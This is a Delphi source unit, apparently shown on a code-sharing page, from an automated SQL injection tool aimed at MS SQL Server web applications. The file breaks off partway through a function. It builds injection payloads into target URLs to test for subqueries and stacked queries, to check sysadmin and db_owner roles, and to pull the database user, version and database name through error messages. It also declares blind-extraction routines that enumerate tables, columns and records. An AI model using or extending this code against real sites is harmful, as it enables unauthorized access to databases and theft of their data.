📄 cjdatabase_unit.pas
字号:
unit CJdatabase_unit;
interface
uses
Windows,Messages,SysUtils,Variants, Classes, Graphics, Controls, Forms,Dialogs;
//function GetHttpHead(str_url:string):string;
function GetQuery(str_url:string):string; //找出关键字
function CanMulticase(str_url :string;sContent:string):boolean;
function CanSubquery(str_url:string;sContent:string):boolean;
function GetUserPower(str_url:string;sContent:string):string;
function GetUserPowerEx(str_url:string;sContent:string):string;
function GetUser(str_url:string):string;
function GetSQL_Version(str_url: string): string;
function GetDbName(str_url: string): string;
function GetRecordCount(str_url,TableName:string):string;
function GetRecordCountByDb(str_url,str_db,TableName:string):string;
function GetUserTableCount(str_url:string):integer;
function GetTableName(str_url:string;iTop:integer):string;
function GetTableNameByDb(str_url:string;str_db:string;iTop:integer):string;
function GetTableNameID(str_url:string;TableName:string):string;
function GetColumName(str_url:string;iTop:integer;TableName:string):string;
function GetColumNameByDb(str_url:string;iTop:integer;DbName:string;TableName:string):string;
function GetColumnCount(str_url:string;TableName:string):integer;
function GetColumnCountByDb(str_url:string;str_db:string;TableName:string):integer;
function GetColumType(str_url:string;CName:string;TableName:string):string;
function GetData(str_url:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
function GetDataByDb(str_url:string;DbName:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
function GetDatabaseName(str_url:string;iTop:integer):string;
function GetDatabaseCount(str_url:string):integer;
function Inject_method(str_url:string):integer;
function Inject_method_ByKeyWord(str_url:string;KeyWord:string):integer;
function Database_type_method(inject_methord:integer;str_url:string):integer;
function Database_type_method_ByKeyWord(inject_methord:integer;str_url:string;KeyWord:string):integer;
function a(max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string;btype:integer):boolean;
function GetTableCharLen(iTop:integer;URL:string;sContent:string):integer;
function b(min_num,max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string):integer;
function IfErrorReport(str_url:string):integer;
//*****************
function GetUserCharLen(str_url:string;sContent:string):integer;
function UserlenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
function UserCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
//*****************
function DBNameCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
function GetDBNameCharLen(str_url:string;sContent:string):integer;
function DBNamelenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
function DBCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer):boolean;
function GetDBCount(URL:string;sContent:string):integer;
function GetDBCharLen(iTop,iPos:integer;str_url:string;sContent:string):integer;
function DBCharLenB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string):integer;
function ColumnA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string):boolean;
function GetColumnLen(iTop,iPos:integer;str_url:string;sContent:string;tableName:string):integer;
function ColumnB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string;tableName:string):integer;
function ColumnCountB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string;tableName:string):integer;
function RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string;ColumnName:string;ColumnNames:TStringList):boolean;
//function RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string):boolean;
function GetRecordCountEx(iTop,iPos:integer;str_url:string;sContent:string;tableName:string):integer;
function GetColumnLenEx(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
function GetColumnB(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
function GetRecordCountList(str_url,TableName:string;inmethrord:integer):string;
function GetDataList(str_url:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList;injmethord:integer):string;
function FunTableExis(URL_source,TableName:string):Boolean;
function FunfieldExis(URL_source,TableName,FieldName:string):Boolean;
function CommonCheckStr(URL_check:string):boolean;
function CommonGetChar(URL_check:string;minv,maxv:integer):string;
var
Inject_methord:integer;
Database_methord:integer;
IferrReport:boolean;
implementation
uses
define_unit,Main_Unit,ThreadHttpGet;
//**********************************************************
//函数:判断是否支持子查询
function CanSubquery(str_url:string;sContent:string):boolean;
var
URL:string;
str_ext:string;
begin
str_ext:='%20And%20(select%20count(1)%20from%20sysobjects)>1%20';
URL:=str_url+str_ext;
if define_unit.GetURLCode(URL)=200 then
result:=true
else
result:=false;
//*********************
end;
//**********************************************************
//函数:判断是否支持多语句执行
function CanMulticase(str_url :string;sContent:string):boolean;
var
URL:string;
str_ext:string;
begin
str_ext:=';declare%20@a%20int--';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext;
end;
3: begin
URL:=str_url+'%25''%20'+'%20And%20''%25''='''+str_ext;
end;
end;
//if define_unit.GetURL(URL)=200 then
if define_unit.GetURLCode(URL)=200 then
result:=true
else
result:=false;
end;
//**********************************************************
//函数:获取数据库用户的权限
function GetUserPowerEx(str_url:string;sContent:string):string;
var
i :integer;
power:string;
URL:string;
str_ext:string;
begin
//**********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//**********************
for i:=0 to High(define_unit.str_Power) do
begin
str_ext:='%20And%20Cast(IS_SRVROLEMEMBER('''+str_Power[i]+''')%20as%20int)=1';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
if define_unit.GetURLCode(URL)=200 then
begin
power:=power+define_unit.str_Power[i]+'|';
end;
end;
if power='' then
begin
str_ext:='%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20int)=1';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
if define_unit.GetURLCode(URL)=200 then
power:='db_owner'
else
power:='public';
end;
result:=power;
end;
//**********************************************************
//函数:获取数据库用户的权限
function GetUserPower(str_url:string;sContent:string):string;
var
i :integer;
power:string;
URL:string;
str_ext:string;
IdGetObj:TThreadHttpGet;
begin
for i:=0 to High(define_unit.str_Power) do
begin
str_ext:='%20And%20Cast(IS_SRVROLEMEMBER('''+str_Power[i]+''')%20as%20varchar(1))=1';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
IdGetObj:=TThreadHttpGet.Create(true);
IdGetObj.FURL:=URL;
IdGetObj.Resume;
while(not IdGetObj.Success) do
begin
application.ProcessMessages;
sleep(100);
end;
//if define_unit.GetURL(URL)=200 then
if IdGetObj.iCode=200 then
begin
power:=power+define_unit.str_Power[i]+'|';
end;
IdGetObj.Resume;
IdGetObj.Free;
IdGetObj:=nil;
if pos('sysadmin',power)>0 then
begin
power:='SA';
end;
break; //只检测是不是sa
end;
if power='' then
begin
str_ext:='%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
if define_unit.GetURLCode(URL)=200 then
power:='db_owner'
else
power:='public';
end;
result:=power;
end;
//**********************************************************
//函数:获取当前数据库的用户
function GetUser(str_url:string):string;
var
URL:string;
str_ext:string;
begin
str_ext:='%20And%20char(94)%2Buser%2Bchar(94)=0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try // char(12)='|' ,%2B解释为+号
Result :=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
Application.MessageBox(pchar('获取当前数据库的用户出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
end;
//**********************************************************
//函数:得到当前SQL Server的版本号
function GetSQL_Version(str_url: string): string;
var
URL:string;
str_ext:string;
begin
//*********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
str_ext:='%20And%20char(94)%2B@@version%2Bchar(94)>0';
{
case Inject_methord of
0: begin
// Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
}
URL:=str_url+str_ext;
{
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
}
//*********************
try
Result :=define_unit.GetURLMsg(URL );
if Result='' then
Result:='未知版本';
except
on E:Exception do
begin
Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end ;
end ;
//*********************
end;
//**********************************************************
//函数:取得数据库名
function GetDbName(str_url: string): string;
var
URL:string;
str_ext:string;
begin
str_ext:='%20And%20char(94)%2Bdb_name()%2Bchar(94)=0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
define_unit.FDbName:=define_unit.GetURLMsg(URL);
Result:=define_unit.FDbName;
except
on E:Exception do
begin
Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
end;
//**********************************************************
//函数:获取数据库表名
function GetTableName(str_url:string;iTop:integer):string;
var
str_ext:string;
URL:string;
begin
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
try
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -